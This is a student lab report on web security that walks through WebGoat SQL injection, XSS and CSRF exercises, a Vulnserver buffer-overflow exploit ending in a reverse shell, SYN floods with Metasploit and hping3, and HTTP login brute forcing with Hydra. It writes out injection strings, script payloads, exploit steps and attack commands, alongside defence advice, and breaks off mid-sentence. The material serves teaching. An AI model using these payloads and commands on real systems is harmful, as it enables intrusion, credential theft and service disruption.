Messages
Proposals
Get Urgent Help In Your Essays, Assignments, Homeworks, Dissertation, Thesis Or Coursework Writing
100% Plagiarism Free Writing - Free Turnitin Report - Professional And Experienced Writers - 24/7 Online Support
This report
illustrates the web security and the software that it will be using, how it can
secure the computer from the risk of harming apps and being attacked, and then
will show the working plan.
This project will be about web security, how can the attacker attack the victim and how to secure the web from this attack. The report will show the most popular ways and go in detail for some of them.
System overview of the web security and the software
In this project, different software will be used, the OS will be using Ubuntu Linux 18.4, Windows 10, and Kali Linux, as operating systems. Furthermore, WebGoat will be used as a website and web server for ethical hacking initialised attacks. All of these systems will be implemented in VirtualBox for security and safety.
Description of software:
VirtualBox: is an open source software from Oracle that virtualizes for a deferent operating system, and it runs as a normal operating system inside the host machine. So, the virtual machine can run deferent operating systems such as Ubuntu, Kali Linux, windows, and so on. For my project, I will be using VirtualBox to increase safety. One of the VirtualBox features is that it can do internal network and can connect to the internet through host machine. Furthermore, it can disconnect the internet when the host machine is still connecting. The necessity for this project is the internal network for attacking by deferent ways to the WebGoat. For installation, see Appendix 1.
Ubuntu: is the Linux operating system and is an open source which uses Ubuntu 18.4 for installing WebGoat in it to be the host of the web server and the victim of the attack. It chooses Ubuntu Linux because it lights operating system on the host machine and it has a Burp Suite that tests Web application security. The Burp Suite is installed in Ubuntu by default because it has application debugging tools installed by default. Due to those reasons, this OS is used. For installation, see Appendix 2.
Kali: is a Linux operating system. It is an open source and a best operating system for analysing and testing or hacking because tools such as Metasploit and more will be used in this project. Therefore, hackers like to use Kali because of good reasons to use it to see from the side of view and it gives good ways to stop that attacking. Also, the Kali design is used to test ethical hacking and network security rating. For installation, see Appendix 3.
WebGoat: is an open source software which is used for testing and learning the web security. This software is owned by OWASP and WebGoat is exercised to give knowledge about attacks and how to avoid being hacked. WebGoat will be used in this project for carrying out tests. However, WebGoat 8 comes with a web server which means that there is no need to install a web server with WebGoat and the suggesting web server was Tomcat. For installation, see Appendix6.
Burp Suite: is a tool to test the security of web sites and applications. The Burp suite has a deferent edition for using the Professional edition and an Enterprise edition that’s not free. It has a free trial and then need to pay to use, and there is a common edition it free but has not all the functions of the Burp suite. The Burp suite common edition has a basic functionality, for example, the HTTP proxy, Scanner, and intruder etc.
Type of attacks:
SQL-injection attack: There are many types of the SQL-injection, the SQL-injection simply is used for a weakness in the database, this weakness will be on the database if data is created without escape characters and strongly typed, which make it hard to know the result.
XSS: It stands for Cross-site scripting, this type of attack is typically found in web applications. XSS allows the hacker to inject client-side scripts into web pages shown by another client. On another word, some attacker adding a code for pages viewed by normal users. usually, find this type of attack on websites that use HTML. Hackers who take advantage of weaknesses in Web sites often try to play with the key sources of the system such as Access Control.
DOS attack: The abbreviation of DOS is (denial-of-service). It means that a group of computers attack one server to block the service. Many websites are blocked from working because of this attack. Come from more than one computer or source at the same time. When a "DoS attack" happens, the traffic of the site is used, resulting in the stopping of site and visitors unable to see it.
CSRF: It stands for Cross Site Request Forgery known as one-click attack, the CSRF is similar to XSS in work but the difference in CSRF is the possibility of tricking the web application, stealing user cookies, modifying data in the control panel, or even sending e-cards and shopping.
Buffer overflow: It happens when writing data in a buffer as overwritten too much of data and occurs as a result of non-verification of user input that could add more data than the buffer. More simplified definition of this situation is that when a glass of water is filled with water, the water will spill out of the glass.
Web Authentication Hacking: There are different types of web authentication. WebGoat has two of them and there is another one with HTTP login authentication in this project will do it in details.
Project plan Microsoft project
To make the plan for the project, I used Microsoft project to create this plan with date and tasks, starting with what will doing in this date, also how long each task will tack to be done, and how long work in each day. The start date of my project 4th of February for the preliminary report and my plan starts from that day until the first of May.
For more details, see the appendix 5.
Work to date:
SQL-injection (advanced) part 3
In this part, I am trying to get all the database information. By injecting of the database in the WebGoat:
Try
to pull the normal data by my user name which is (Talal) and there was no
result match, as figure 1.
Then, I try to use the (‘) mark and the result is figure 2
Finally, the way of an attack by using the code (talal’; select * from user_system_data;--)
Writing
the code in the name place and clicking on the bottom Get Account info, the
result is all the databases are shown in figure 3
Then, try one of the passwords in password place, and the result is in figure 4. It successfully works.
SQL-injection (advanced) part 5
In this part, trying to login as Tom by injecting the database and finding the password of the Tom user. Figure 5 will show the part before start working because in this part will work in the error message to guide to Tom password. In this part, the system not give all information, need to guess and try by asking a series of questions to the system, and the system answer by a true or false response.
Starting with guessing randomly password for username Tom for example (a).
The result
will be as figure 6.
There is a registration module that can register a new user and can ask the series of questions
The register
form same as figure 7
Now. I will try to register myself and see the process of registration. After the register the message as figure 8 successful.
So, trying to register myself a to make sure that new account is registered, and start a true-false response with the server about the new password which known the password and then start guessing Tom password.
After making
sure the new account is been in the database of the WebGoat, now try to run a
query to find the password of new account been created. In figure 9 the true
message is shown, which is the user being existent. This query in figure 9 is
for checking the number of passwords.
Then, see which letter is the first and so on, for the test, there is only one letter which is (a) will write the query to check that letter is correct or not by doing the true-false with the server.
Figure 10 shows
that (a) is the first one in the test account.
Now, start with finding the number of characters of the Tom password to start guessing his password. This step is the same as figure 9. It will use the query, Tom’ length (password) =1 - -
This
is shown in figure 11, then increases the number in the query until getting the
true message, so the result is Tom password it has 23 characters. In the left
pitcher try to find the character number with using > and <, the number
that tried by is 1,5,10,15,20, and 25 when retch the 25 got the true message
and stopped and then reduces the number from 25 to 24, and 23 when doing the
query with 23 it gives the true message. So now that means Tom password is 23
characters.
For the unowned password, it tacks too much time to try all the alphabet so, there is a query to make it short or less that divides the alphabet to the half and writhe the query same as figure 12. In figure 12, it starts to guess the Tom password, starting with the first character, and so on. The query in figure 12 is false which means that (a) is not the first letter of the password.
The algorithm for detecting the password using the following queries is shown in figure 13.
Finding the first character of Tom password is (t) so, move to the second by changing the query from tom’ and substring(password,1,1)=’t’ - - to tom’ and substring(password,2,1)=’t’ - -
as shown in
figure 14.
After all, trying with Tom password founded that Tom password is
(This is a secret for tom only) without
space.
SQL injection:
In this par trying to get all the database information. By injecting of the database in the WebGoat. There are two way the first when the data type is string. Second when the data type is numeric.
String SQL injection:
In figure 16, the WebGoat page is illustrated before injecting.
Trying to find the weakness of this database by writing name, not in this database.
For example
(talal). So, the result as shown in figure 17
Then, try with name in this database. For example, (Smith) the result was expected just as figure 18 shows.
In this step, trying the single quote (‘) so, the result was as figure 19 shows.
So, that malformed error indicates that it is possible that SQL injection can happen, the way to do the injection forces the condition to be true by (‘ OR ‘1’=’1 ) the true statement in a string table. After doing the true statement, SQL will get the result as the figure 20.
In figure 20, successful SQL injection happened and gave all table.
Numeric SQL injection:
In this type of injection, the previous way does not work because was numeric way to do the true statement, but this numeric needs to do the true statement.
Figure 21 shows
the WebGoat page before doing the injection.
Figure 22 tries
the existing name and the result shows data related to this name.
To do the true statement need to write (OR TRUE), this is the way of the true statement for the numeric typing True word, so the result is giving all databases.
Real world examples of SQL injection
“In July 2012 a hacker group was reported to have stolen 450,000 login
credentials from Yahoo!. The logins were stored in plain text and were
allegedly taken from a Yahoo subdomain, Yahoo! Voices. The group breached
Yahoo's security by using a (union-based SQL injection technique)”.
On March 7, 2014, officials at Johns Hopkins University publicly
announced that their Biomedical Engineering Servers had become victim to an SQL
injection attack carried out by an Anonymous hacker named "Hooky" and
aligned with hacktivist group "RaptorSwag". The hackers compromised
personal details of 878 students and staff, posting a press release and the
leaked data on the internet.
In May 2012, the website for Wurm Online, a massively multiplayer online game, was shut down from an SQL injection while the site was being updated (Richards, T. 2017).
XSS:
Reflected XSS
Reflected
Cross-site Scripting (XSS) happens by injecting the browser with script code
within a single HTTP response.
In this task, WebGoat
needs to find the field is acceptable to do the XSS attack in it. The page of
WebGoat is shown in figure 24.
Figure 24 is giving the shopping cart form and it has 6 filed that can write the java script code in it, so after trying all of them, it found that acceptable filed is credit card filed, as shown in the figure 25.
There is a good reason to choose the credit card filed the credit card it not short numbers and it has spaces in it, so that will be best place for the script code. To do the reflected XSS attack, type the script code in the credit card filed and click Update Cart button, then the reflected XSS attack happened, and the message is successfully shown.
identify potential for DOM-Based xss
It is changing
the DOM environment in the client browser used by the original client-side
script, so that the client-side code runs in an unexpected way.
To do this type of attack, it needs to click on the submit button so the message in the figure 26 shows the need to check the Goat Router.js file.
From the URL it can be discovered how the WebGoat works for example, the URL of WebGoat is localhost: 8080/WebGoat/start.mvc#lesson…. So, the base route in this page is start.mvc#lesson to do the attack right click and open the inspector for the page and then go to debugger tap, so from the sources finding the WebGoat.js and click on it will show the source page as figure 27. Inside the WebGoat.js there are too many files the important file called goat App then inside its file called view inside it there is a Goat Router.js when clicking on the Goat Router.js show the code, in that code will see routes that are shown in figure 27.
To do this task, the route of this page is start.mvc#test/
DOM-Based xss
This task is similar to the previous task but the difference is the way in doing the attack. In this way will do it by URL, open a new tap in the browser and edit the URL by add the script code in it before that open the inspector of browser and from the inspector click on console and then in the URL space will type:
( localhost:8080/WebGoat/start.mvc#test/<script>webgoat.customjs.phoneHome();<%2Fscript>
)
When hitting
enter, the page is change and the test word shows in the plank page as shown in
figure 28.
And in the console show that phone home script
is worked and the response and gives response number.
phone home function xss attack
In this task will use the phone home function with this comment page. First try to post normal comment as show in figure 29 and then will post the script of the phone home, the script will be use is: <embed src=”javascript:webgoat.customjs.phoneHome();”> typing the script in the comment and hit enter but before that, open the console to see the result of the attack or the response.
After opening the console and hitting enter, the response is shown in figure 30, so the phone home response by number this the answer for the WebGoat.
Defend of XSS attack
There are three ways to stop the XSS attack off the website or application.
Escaping:
The first way
is stopping XSS shown in the website or applications is by escaping user input.
Escaping data means taking the data website or application has been received
and make sure it’s secure data. Deny the characters for example (–), especially
(< >) and (/). The page should not allow users to add HTML, URL, and
JavaScript.
Validating input:
The second way
is validating input, which is the process to make sure the website or app is
rendering the correct data and block malicious data. the whitelisting and input
validation are a common way to stop the SQL injection, but it works with XSS
attack.
Sanitizing:
The third is way to block XSS attacks is to sanitize the inputs. Sanitizing inputs is a strong defence, but not used alone to block XSS attacks. It needs the other ways with it.
The website or
app needs all three ways to be protected from the XSS attacks because of each
one does a different job of blocking the script from the escaping, validating
input, and sanitizing.
CSRF
Cross-site
request forgery also called one-click attack, is a type of website attack,
where unwanted commands are transmitted from a user that the web application
trusts.
Basic get CSRF
Task will
cover information about the basic CSRF attack with WebGoat. In this attack,
there is a button called submit query shown in figure 30, when clicking that
button will open a new window that shown in figure 31
Figure 31 shows that the new page has three line the first is flag and this flag is null, the second is success and it is false, which means the CSRF attack is not happened, finally the third is the message.
To do the CSRF attack by copying the URL of the new page and in that URL was written csrf=false by editing that is shown in figure 32 will do the csrf attack ad get the flag number.
Get CSRF
From WebGoat,
this task is simple review page, and needs to post review as another parson, so
need to create a button to launch the CSRF attack so that by write the HTML code and connect that HTML page to the WebGoat page, before writing the HTML code need to get the request URL to start creating the HTML code and linked it to the WebGoat page, that allowing to post review as another parson.
To get the link of request form the WebGoat, open the page and right click open inspect of page from the browser and choose network that is shown in figure 33.
Then in the WebGoat page, need to send test review to get that link, and then start do the HTML the code is shown in figure 34.
n the code, link the new page with WebGoat page and add 3 input because the request will get 3 inputs text and the number of stars and validate request, so the validateReq is a value which can be found from inspect of the browser, finally create submit button.
Run the HTML file that was made in figure 35
After clicking, that button will show the new page with true and message submit is correctly from another site. That is shown in figure 36.
CSRF attack a APIs
Task is about posting message to endpoint by use JSON data, to do that need the recast URL and the JSON data, will create a new HTML page with that, to get the URL it same the previous task, send test post while the inspector of the web browser open and get the link of the network tape. To create the HTML, basic page with title, header, and button will be developed, when that button clicked will launch the CSRF attack. The HTML code is shown in figure 37.
After clicking the button, a page will come up (see in figure 38) with true and message told the CSRF attack is happened and the flag number.
Prevent CSRF attacks
There are two sides on the sever side and the client side:
To prevent
CSRF attacks of the server side, the owner of the server or the website should
transition from cookies that perform session-tracking to session tokens that
are dynamically generated. This would make it more difficult for an attacker to
get a hold of a client’s session.
To prevent
CSRF attacks of the client side, it is important to know what is needed to
authenticate into that website to be unprotected. Here are some actions to
prevent CSRF attack. Update anti-virus, don't open emails while logging to a
bank site, always log off whenever you finish banking don't close the browser
without log off, don't save your username and password for banking in the
browser, disable running scripting in your browser, and use a two different
browser one for banking and other for normal browsing.
Example for
CSRF attack:
While the
client logins to a bank website and the session is active, receive an email
with a link and been asked to click into that link, if the client clicks on the
link, a script will execute to the banking site, to transfer funds from the
client account to the attacker account. in this
case, the
attacker uses the client login information, computer, and IP address for the
attack.
Buffer overflows of the web security and the software
Anatomy of memory:
Its content of Kernel at top and text at the bottom, the kernel is the command line having the pleas of it in the memory is bunch of ones because it is at the top of it. The text is read only code, the pleas of it in the memory is bunch of zeros because it at the bottom of it. The buffer overflow attack happens in the stack of the memory.
Anatomy of stack
Zoom is the stack from the memory, it
divides into 4 parts ESP (Extended stack pointer), Buffer space, EBP (Extended
Base pointer), and EIP (Extended instruction pointer)/ Return address.
So, the ESP in the top of the stack
and the EBP in the bottom; in normal use for buffer the buffer space fills up
with characters, so the buffer space is going to go downward, and the
characters should stop when it reaches the EBP. However, if their buffer
overflow attacks the overflow, the buffer space reaches over EBP and EIP. The
EIP is the pointer address or return address. The attacker uses this address to
point to directions that instruct. These directions are going to be the
malicious code that give a reverse shell, which will lead to root.
Steps to conduct a buffer overflow:
1. Spiking: is a method that is
used to find a vulnerable part of program once fined the vulnerable of the
program will move to next step.
2. Fuzzing: is kind of similar
to spiking. Fuzzy sends a bunch of characters at a program and see if can be
break, if broken, it will move to next step.
3. Finding the offset: this
step is finding in what point it has been broken and get the offset before
moving to next step.
4. Overwriting the EIP: in the
offset that found overwrite the EIP pointer address, it allowed to control the
EIP.
5. Finding bad characters and
right module: clean up things and then move to next step.
6. Generating Shell code:
after doing the step 5, shell code is generated (malicious shell code) that
allow to get the reversed shell. Use that to point EIP to malicious shell code
then move to next step.
7. Root.
Tool for doing the buffer overflow
1. Victim machine: Windows 10
2. Vulnerable software
Vulnserver.
3. Attacker machine: Kali
Linux.
4. Debugger: immunity debugger.
Buffer overflow walkthrough
Staring with Spiking, after install
and setup the windows 10, appendix (1) install in it the Vulnserver and
immunity debugger appendix (2). So, after that in windows 10 disable Real-time
protection, do that because the Vulnserver will be blocked by windows defender.
Note (run all the program as administrator).
For installing Kali Linux, see appendix (3) form Kali command prompt connect to Vulnserver and see if it possible, note (by default Vulnserver runs on port 9999, change the IP address for both machines to 209.165.201.18 for windows and 209.165.201.18 for Kali and make the virtual box internal network by name internet see appendix (4), figure 1 shows the Vulnerable server connected after second try.
Moving on, writing help in caps to see
if command can be used in the Vulnerable server the command shown in figure 2
To do spiking, all commands will be tried above one at time to do the attack. For example, stats by send bunch of characters and see if can overflow the buffer. If the command does the work the program will crash, then will know the stats is vulnerable, if not will move to next one.
The tool used for spiked called
(generic TCP) this tool is show in figure 3
To use the generic TCP, one needs to know IP address, the port number, spike script, and the skip variables
For the IP address, the is pre-set 209.165.201.18
For the port number, it by default 9999
For the spike script, it per write the file called stats.spk show in figure 4
For the skip variables it is zero.
So, will start to use the stats
command in first try, this shown in figure 5
After hitting enter, it is starting to
run but nothing happing, getting that from the immunity debugger, as figure 6.
In figure 6 the right side is Kali run the spike with stats command in the left
side the immunity debugger taking the command, and nothing happened. Killing
the TCP by control +C to stop the attack so it is clear the stats are not
vulnerable.
After some research about what command
will be vulnerable to do spiking, I found the TRUN.
So, Trun need to change the script the
deferent will be shows in figure 7 saved as trun.spk
Then, run the Trun same as the stats
but the name of the file of the script will be different.
That means their access violation when
executing the Trun script. There is a need to stop the attack by killing the
script by control +C. the Vulnserver it crashed that mean the attacks happened,
and the immunity debugger write in the registers the overflow also can get
information from it as shown in figure 9 some of this information is in the
first line show that the Trun command sent this command sending hundreds of A’s
that fill up the buffer space and it is over the buffer to the EBP and EIP.
This is clear because 41414141 in Hex means AAAA because it 4 bytes. So, the
overflow happened.
The next step is Fuzzing, python code will
be created that do the overflow and stop when the Vulnserver is crashed, as the
first step shows the Trun command is the working one will be used the code
shown in figure 10. The first line is identifying the type of language used
which is python, the second line is identifying sys and socket and then the
sleep method. Moreover, the buffer = A multiply by 100 that means in each time
the program run, it will write 100 A’s, then the while loop with try, the try
to try connect and do the buffer overflow the first line inside the loop is for
connect to the Vulnserver and the AF_INET it means the IPV4 and the SOCK_STREAM
for the port number. Then, send over the Trun command + the buffer which is 100
A’s, then close and sleep for one second. If it still is connected, keep sending
buffers. If the buffer is flowed, then print (Fuzzing crashed and print the
number of buffers been sent.
So, run that script and the result is shown in figure 11 so it crashed on 2300 the script does not stop when the flow happened need to be stopped when overflow happened because of that the first try was give 5500 bytes, in this time of overflow the flow doesn’t retch to the EBP and EIP. The step will demonstrate three crashes happened.
Now need to find the offset, to find offset that means to look at where the overwrite the EIP because that’s what need to be controlled, the tool using for finding the offset, this tool is provided by Metasploit framework it is called pattern create, this in the Kali machine.
To set the tool from the terminal that
shown un figure 12 the tool has switch L that for length and switch for L is
3000, the 3000 because the Vulnserver is crashed in 2300 bytes. Therefore, the
3000 to be sure the buffer will flow.
After typing this in Kali terminal and hitting enter, it will give the result as figure 12 shows, by copying this code generated by pattern, write python code similar to the fuzzing one, to send this to Vulnserver.
The python code is in figure 13, which has the code generated by pattern, with value of 3000 to be sent to the Vulnserver, after sending this to the Vulnserver will get the value on the EIP, so this code will crash the Vulnserver and give back by the EIP value, then by use the tool of Metasploit and can get the offset, by use the pattern tool but this time in different way.
After running the python code, the Vulnserver is crashed and from the debagger, see the TRUN command with cyclical value generated it come cross the ESP, and the target is the EIP to control this value. The EIP is 386F4337.
To use the pattern, offset kali
terminal is shown in figure 15.
This time, by using the pattern offset with length switch of 3000 and Q for finding and the finding is 386F4337. So, after hit enter that gives the pattern offset, that means inside the 3000 bytes, it found pattern and it relayed back to it. The result is getting the exact offset match at 2003 bytes, sure that is critical because that at 2003 bytes EIP can be controlled.
Now will overwriting the EIP, from
pattern offset discovered that the offset is 2003 bytes, that means there is
2003 bytes before getting to EIP, the EIP is fore bytes long. Will try to
overwrite the four bytes.
To do that, modified python code is required. Other than this the second option is to rewrite it to write 2003 A’s and write 4 B’s in EIP. The code shown in figure 16.
After running this code from kali to Vulnserver, as shown in figure 17 in the EAX, the TRUN is write A’s and EBP with A’s as well and finally the EIP it has 42 42 42 42 that means B’s but in hex, so result of that it is controlling the EIB.
Now, there is need to find bad
characters, finding bad characters in relation to generate shellcode, when
generating shellcode, there is need to know what characters are good for the
shellcode and what characters are bad for the shellcode, that can be done by
running all the hex characters through the program and seeing if any of them
act up by default the null byte x00 acts up.
To that need to find in google the bad charts and from bulbsecurity.com copy all the lists and will use it for python code that shown in figure 18. Deleting x00 is of this list.
After running that code, check out debugger the ESP and right click it before following in dump, so from the Hex dump window look at the hex and see if anything out of place, that show in figure 19 after finding the missing characters.
Now, right module is required which
means looking for a dll or something similar inside of a program that has no
memory protections, which means no depth no ASLR no safe SEH etc.
For doing that, there is a tool called
Mona modules that can be used with immunity debugger to do this this tool will
be installing from github.com and then add it to the immunity debugger in the
path following C:/Program File (x86)/ immunity lnc/ immunity
debugger/pyCommands then go back to immunity debugger and add in the down bar
(!mona modules) will open new window shown in figure 20
The mona modules shows the protection settings in the table, so looking for something attached to the Vulnserver, which is in the second line, this line it also is all false.
So, there is another way to do it as finds the opcode equivalent of a jump. That from kali and from terminal and locate NASM shell, and run it, so try to convert assembly language into hex code that shown in figure 21.
Going to use this as a pointer, the
pointer going to jump the malicious shellcode. The hex code of the JMP ESP
is FFE4.
Then go back to immunity debugger and type this in the down bar (!mona find -s “\ xff \ xe4” -m essfunc.dll) and the result shown in figure 2
The first line that the address is looking for, so, going back to kali and modifying the python code, the code is shown in figure 23.
In this code, add the return address that is found in MONA, that replaces the B’s by the pointer, will have the EIP by the jump code and then the jump code is going to go to malicious code. Adding the pointer in reverse, this reverse is for a special reason that is when talking with x86 architecture do something called Indian format, x86 architecture stores the low order byte at the lowest address and high order byte at the highest address. This code should throw the same code, but it is going to hit a jump point.
Need to edit some setting
in to immunity debugger first before running the code to catch it. Expression is
required to follow the pointer, and then set the breakpoint, when buffer
overflow if hit this pint will not go to next instruction will break the
program and pause into the breakpoint because we need to know that this pint it
been hit.
Now back to kali and execute the script, after executing it the result is shown in the figure 25, see the breakpoint at essfunc.625011AF happened at the program is paused because it hits the breakpoint that means controlling EIP.
So, generate shellcode point directly to that shellcode and it can use the root.
To gain shell, use tool called MSF
venom, that tool help to generate shellcode, the command shown in figure 26.
This is MSF venom by Metasploit and set switch P for payload, the payload for
Windows because the target is Windows machine and shell revers TCP, and assume
x86 will declare that later, so the reverse shell do get the victim connect
back, so need to provide the information of the connect back, that is kali
machine IP address, this is LHOST and the port listening on that is LPORT, and
set the exit func equal thread all that make the exploit more stable, then the
-F for file type that will export in C, then -A architecture x86 and then -B
for bad characters and the bad characters fund.
Then, hit enter and the code will be generated, so copy this code highlighted in figure 27 and add them to the python code. Can see in figure 27 the payload size is 351 bytes.
Modifying the python code by adding a new variable called overflow and paste the generated shellcode, also edit the shellcode variable by add the new variable and
This code is working by executing the
shellcode variable and 2003 bytes that get to the EIP then hit the pointer
address as known the pointer address is the jump address, so will jump to the
set of instruction that provide, which is overflow variable, but before submitting
that, there is need to add knops, knops is padding that means no operation,
that little pad space between jump command and the overflow shellcode, so 32
bytes is the best fit of padding.
Open a new terminal window in kali to set netcat to listen which is shown in figure 29.
Before launching the attack, there is need to make sure the Vuln server is running and execute the python code.
As shown in figure 30, it can
control the Vuln server from kali that’s mean having the root of it
Prevent Buffer Overflow Attacks
The easiest way to prevent Buffer
Overflow is by using a language that doesn’t allow it to happen. However,
changing the language of development is not always possible, in this is the
case, use a secure code for handling buffers. which need to avoid. The strcopy
and strcat functions copy a string into a buffer and append the contents of one
buffer onto another.
also. from use of safe handling buffer
functions and suitable security features for the compiler and operating system,
a good defence against buffer overflows can be built.
searching in the lines of the program
code for potential buffer overflows can be boring, but static analysis tools
that are used to enforce code quality that developed for that reason for the
detection of security weakness during development. For example, Coverity Code
Advisor highlight by red flags for potential buffer overflows. Then, changes in
the code is possible to make it be more secure, replaced manually by searching
for the buffer overflows.
DDoS Attack
There are two types of this attack and
there are many ways to do it by using a different tool.
There is DDOS and DOS, both doing same
attack.
DDOS stand for Distributed Denial Of
Service, that is a cyber attack on a specific server or network, with the
intended purpose of disrupting that network or server’s normal operation, and
DDOS attack dose this by flooding the targeted network or serves with constant
flood of traffic. That causes a disruption or denial of service. In figure 31,
there is a webserver and there is couple of customer browsing website, and
there is someone wanted to do an attack in this webserver by send flood of data
traffic to try and disrupt its service this is DOS attack, so the DOS attack
that attack coming from one source, normally a network or server is able to
handle an attack from a single source because it is easier to pinpoint, the
server can close the connection where the attack come from. The real problem is
the attack comes from multiple sources in same time which is what a DDOS is,
DDOS is an attack from multiple sources all at ones.
To do this attack, there are different ways, the most popular is SYN Flood (Metasploit, Hping3).
The SYN Flood: When two pcs trying to communicate they use the three-way handshake for TCP session, so the attacker send SYN packet and then the server will replay with SYN/ACK packet after replying the server will be waiting to get the last packet from the attacker, but the SYN Flood attack will not replay just send the SYN packet, this the way how the SYN Flood attacks work to overload the server by waiting, in this way the denial of service is working.
Tool for doing the SYN Flood:
1. Victim machine: Windows 10 (Wireshark).
2. Attacker machine: Kali Linux (Metasploit).
SYN Flood Metasploit walkthrough:
Starting with Windows 10, open
Wireshark to see the attack, known as the Wireshark use for network troubleshooting, analysis, and monitoring. Also,
it will open the task manager to see the CPU usage. In figure 33, it shows the
Windows 10 CPU usage with only Wireshark on it is 3% that the Max value before the
attack.
From the kali check, if the attack machine can ping the target machine, and run the Nmap to see the open ports, as shown I figure 34. To send the attack to open port, from the Nmap the port 135 is open so will target this port, it can target all. But in this task, 135 is the target port.
After done with checking, run
Metasploit because it has the tool of SYN flood, so to run Metasploit in
terminal type msfconsole, when it runs, it searches about synflood, so
Metasploit will find where the auxiliary is located. When Metasploit finds it,
now need to use it by typing use and the bath been given by Metasploit. As
shown in figure 35 then see the option of this auxiliary.
The option is interface that for giving the interface a name, MUN that for a number of SYN packets need to send. RHOST is for the victim machine IP address, the RPORT is the port, which needs to send the SYN packet to by default it set 80 but need to change to 135 the chosen port, the SHOST is for spoof how send this attack.
So, set host IP address, set port
number, set the number of SYN packet will be sent. That shown in figurer 36,
after setting now, type exploit to start SYN flood attack. That shown in figure
37.
After running the attack, the CPU percentage is rising up than normal, the percentage was 3% but after SYN flood it is 43%. That is shown in figure 38.
From another side, the capturing of Wireshark clears the
thousands of the SYN packet which have been sending to the Windows machine. The Wireshark with large amount of
traffic is shown in figure 38. In the figure 39, the grey colour in Wireshark
that means the attacker sends SYN packet to the target port 135, and the black ones replay
from Windows.
SYN Flood with Hping3 walkthrough:
Starting with Windows 10, open Wireshark to see the attack, and then open the task manager to see the CPU usage. In figure 40, it shows the Windows 10 CPU usage with only Wireshark on it is 3% that the Max value before the attack.
Now from kali open terminal window and type hping3 -help to see all option to know how use hping3 in details and choose the best for the attack, for this attack, it will use -a to spoof the IP address, -s for SYN flood attack, and -p for port number. The command used for this attack is shown in figure 41.
In figure 41, it shows the attack command after running and showing message for which, no replies will be shown, but moving to Windows 10, will enable us to see how this attack doing with it, that shown in figure 42, that clear the CPU using retch to 100% and the machine freezing, from other hand the Wireshark is show red traffic of attack in the port what is chosen. Also, more time will be leaving the attack running more taking resource from RAM.
prevent DDoS attacks
Increase bandwidth
The basic step, you can do it which makes the infrastructure "DDoS resistant" is to be sure that there is enough bandwidth to handle the traffic that comes from malicious activity. This way worked in the past, but nowadays the attackers use the rise of amplification attacks, so this way just makes it harder for an attacker to do the DOS attack.
Use redundancy in the infrastructure
and DNS
This way is all about spreading website in different data centres with a load balancing system and distributes traffic. If possible, use data centres with different places. It will make it hard for the attacker to denial the service if successfully gets one of them, the other will do the job.
Configure network hardware to avoid
DDoS attacks
There are some configure in the network devices, for example, configure the firewall or router to drop any incoming ICMP packets, and DNS responses can block UDP from the outside network. It can help in stopping some type of DDoS attacks.
Use anti-DDoS software and hardware
modules
Set up web application firewalls on
servers and use load balancers. There is a software protection of DDoS protocol
attacks, for example, SYN flood attacks, that by monitoring how many not
complete connections exist and delete it when the number increase than a normal
number. There is more similar software for different types of DDoS attacks.
Web Authentication Hacking
This methods tells about how to secure the web page of any user not authorise, by using http authentication, the http authentication is a mechanism to allow only authorized users, in this task, tries will be made to hack it by using Metasploit, However, the http authentication works as figure 43 shows the user ask the webserver to access and the server ask if this user is authorise user if yes, it will give the access if not, it will show the unauthorised page will error number 401, this is the basic authentication.
Steps to conduct a web authentication hack:
1. Install and set up apache2.
2. Configure basic
authentication in apache2.
3. Create test web page.
4. set Metasploit with auxiliary
http_login and run attack.
5. Set Hydra tool and run attack.
6. Set Ncrack tool and run attack.
7. Set Medusa tool and run attack.
Machines for doing the web
authentication hack:
1. Victim machine: Ubuntu
(webserver apache2).
2. Attacker machine: Kali
Linux.
Web authentication walkthrough:
Starting with installation and setup
apache2, to install apache2 in ubuntu no need to much time only type in
terminal (sudo apt-get install apache2) and then the system will ask. Do
you want to continue [Y/n]. Type Y to continue and then will go through
installation, when it finishes open the web browser and in the URL type either
localhost or the IP address for the ubuntu, as shown in the figure 44
This is the default page of apache2.
Then configure basic authentication in apache, that can be done by install apache utilities, open a terminal type (sudo apt-get -y install apache2-utils) will start install, when it finishes, there is a need to create a new file with name auth-basic.conf that should be in the path of etc/apache2/sites-available that can be done by command (sudo nano etc/apache2/sites-available/ auth-basic.conf) inside that file, type command that show in figure 45
Therefore, there is a need to create user by command (htpasswd -c /etc/apache2/.htpasswd talal) in that command creating a user with name talal, when click enter will ask for a new password. The password chosen is 111 and then ask for re-type the new password should be same as the first, then it will show the massage as shown in figure 46
After that, make a new directory with
name auth-basic by command (mkdir /var/www/html/auth-basic) this where
the html page is store and mkdir is Linux command for create a new directory.
There is a need to activate the new
configuration by command (a2ensite auth-basic) then, it will show
message to reload the apache2 to active the new configuration, to reload the
web server type (systemctl reload apache2).
Moving on, create test web page, this page should be inside the new directory that has been made with path /var/www/html/auth-basic and name it index.html to be the default page of the webserver, the basic page shown in figure 47.
Then, try to access to the web page through web browser, open the browser in the URL type either localhost or the IP address, will use the IP address and the directory name that is shown in figure 48.
If cancel is clicked, will open the
unauthorized page show in figure 49
Thus, the basic authentication is working the next step with kali to hack it
Metasploit with auxiliary http_login
From kali, open a terminal and type msfconsole to run the Metasploit. In the Metasploit, there are a lot of auxiliaries that use to hack or test the security in this case need to hack the basic authentication the best auxiliary for that is http_login this auxiliary it simple to use first need to find the path of the auxiliary in the Metasploit run search about http_login then will give the location of it, when fide the location type (use auxiliary/scanner/http/http_login) and then type show option the show option to help how to use the auxiliary in correct ways, so the option shown in figure 50.
Therefore, to do the attack, there is
a need to create two files. One for the username and the other one for password
with some suggestions that might be correct, and set the username on the option
of USER_FILE and the password for the PASS_FILE, also for more set the AUTH_URL
by /auth-basic, STOP_ON_SUCCESS for true, and RHOST by the IP address of the
webserver IP address, that is shown in figure 51
Finally, type the command run to start
the attack. The auxiliary will start matching the username with password and
try to unlock the http authentication with the suggestions information it had
it, if nothing match and not find the true username and password will give
error message, other hand if it find the best match will give the correct user
name and password to login as normal user. In figure 52. Shown the not match
result with – sighing and the best match with + sighing.
Hydra Software
Hydra is one of the best tools
in this platform of attacking, besides its vast to do this type of attack,
Hydra can also work with different protocols such as telnet, HTTP, https, FTP,
several databases, SMB, and more up to 50 protocols.
For doing this attack, there is a need to type
Hydra in command and it will show the option and how it can be used Hydra to
start attacking the HTTP authentication, so from the list need -L that for
suggesting usernames, _P that for suggesting passwords, -m that for URL of the
website and the name of the protocol. Type that in the command (hydra
-L username.txt -P password.txt 209.165.201.18 -m
http://209.165.201.18/auth-basic http-get)
As shown in figure 53, the Hydra tool it finds the username talal and the password 111 that is highlighted in green.
Ncrack network authentication
Ncrack is a network
authentication cracking tool. it does the same job to find the username and
password from pointing list, this tool it developed to help the network's
